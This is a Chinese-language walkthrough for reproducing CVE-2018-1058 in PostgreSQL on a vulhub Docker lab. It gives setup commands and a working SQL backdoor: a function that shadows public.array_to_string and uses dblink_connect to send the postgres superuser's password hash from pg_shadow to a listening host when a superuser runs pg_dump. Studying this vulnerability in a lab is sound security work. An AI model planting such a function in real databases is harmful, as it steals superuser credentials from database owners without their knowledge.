漏洞原理
PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息 影响版本:PostgreSQL < 10
漏洞复现
环境准备
打开漏洞存放路径:cd /home/guiltyfet/vulhub/postgres/CVE-2018-1058
docker-compose up -d
docker ps
注意端口下面要用到:环境启动后,将在本地开启PG默认的5432端口。
另起一个终端
先通过普通用户vulhub:vulhub的身份登录
psql --host 192.168.144.1 --username vulhub 输入口令:vulhub
注意:POC里面的端口和IP地址
查看本机ip和端口
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$ select dblink_connect((select 'hostaddr=192.168.144.1 port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); SELECT pg_catalog.array_to_string($1,$2); $$ LANGUAGE SQL VOLATILE;
退出exit
监听192.168.144.1的5432端口
然后我在192.168.144.1上监听5432端口,等待超级用户触发我们留下的这个“后门”,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。执行上述命令的同时,“后门”已被触发192.168.144.1机器上已收到敏感信息:
docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub
